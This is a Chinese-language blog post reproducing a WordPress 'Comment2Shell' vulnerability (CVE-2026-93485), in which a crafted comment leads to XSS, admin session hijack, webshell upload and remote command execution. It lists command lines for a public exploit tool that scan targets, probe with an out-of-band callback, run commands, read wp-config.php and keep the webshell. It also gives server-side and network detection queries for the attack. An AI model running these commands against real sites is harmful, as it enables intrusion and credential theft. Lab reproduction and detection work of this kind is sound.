WordPress Comment2Shell漏洞复现CVE-2026-93485

简述:

攻击者只需在评论框里填一段特殊构造的文本,等管理员打开文章看了一眼,整套攻击链就自动跑完:植入XSS→劫持管理员会话→上传Webshell→执行任意命令→Shell自毁消除痕迹。这就是CVE-2026-93485,被安全圈称为"Comment2Shell"的高危漏洞。

影响范围:

WordPress 4.7 ~ 7.1(含)

利用前提

评论功能开启 + 管理员查看文章

使用Comment2Shell工具集检测



# 克隆项目
git clone https://github.com/DeathShotXD/Comment2Shell.git
cd Comment2Shell

# 项目内包含 nuclei/templates/comment2shell.yaml
nuclei -t nuclei-templates/ -l targets.txt

# 版本扫描(被动检测目标WordPress版本)
python3 comment2shell.py --scan -t https://target.com

# 批量扫描
python3 comment2shell.py --scan -f targets.txt --threads 20

# 发送无害XSS探测payload(仅触发alert,不上传shell)
python3 comment2shell.py --probe -t https://target.com

# 带OAST回调查询
python3 comment2shell.py --probe -t https://target.com \
  --callback https://your-id.oast.example
  
  
# 执行命令后自动删除webshell
python3 comment2shell.py -t https://target.com -c "id"

# 读取wp-config.php
python3 comment2shell.py -t https://target.com -c "cat wp-config.php"

# 保留webshell(不删除)
python3 comment2shell.py -t https://target.com -c "id" --no-cleanup

# 使用已知shell路径
python3 comment2shell.py --exec -t https://target.com \
  --shell-path ab12cd/ab12cd.php -c "cat wp-config.php"

排查

Server-side IoC
# Suspicious comment submissions (newline in blockquote cite)
grep -rE 'blockquote.*cite=.*\n' /var/www/html/wp-content/ 2>/dev/null

# wp_comments table
mysql -e "SELECT comment_ID, comment_author, LEFT(comment_content,200) \
  FROM wp_comments WHERE comment_content LIKE '%blockquote%cite%\
  onfocus%' ORDER BY comment_date DESC;"

# Recently uploaded single-file plugins
find /var/www/html/wp-content/plugins/ -maxdepth 2 -name "*.php" \
  -newer /var/www/html/wp-config.php -not -path "*/akismet/*" \
  -not -path "*/hello*"
Network IoC
# Unusual POST to wp-comments-post.php with blockquote + onfocus
http.request.uri == "/wp-comments-post.php" AND
http.request.body contains "blockquote" AND
http.request.body contains "onfocus" AND
http.request.body contains "autofocus"

# Single-file plugin uploads from non-admin IPs
http.request.uri == "/wp-admin/update.php" AND
http.request.body contains "pluginzip"

本地复现

使用vulhub环境启动

image

扫描检测

image
image

exp利用

Active XSS probe
image
RCE
image
失败了,那就换这个github项目提供的靶场再试试
image
启动
image
直接命令执行
image
浏览页面触发后
image

参考:

WordPress Comment2Shell漏洞分析:一条评论如何变成服务器RCE

posted @ 2026-09-28 14:24  菜就多练forever  阅读(7)  评论(0)    收藏  举报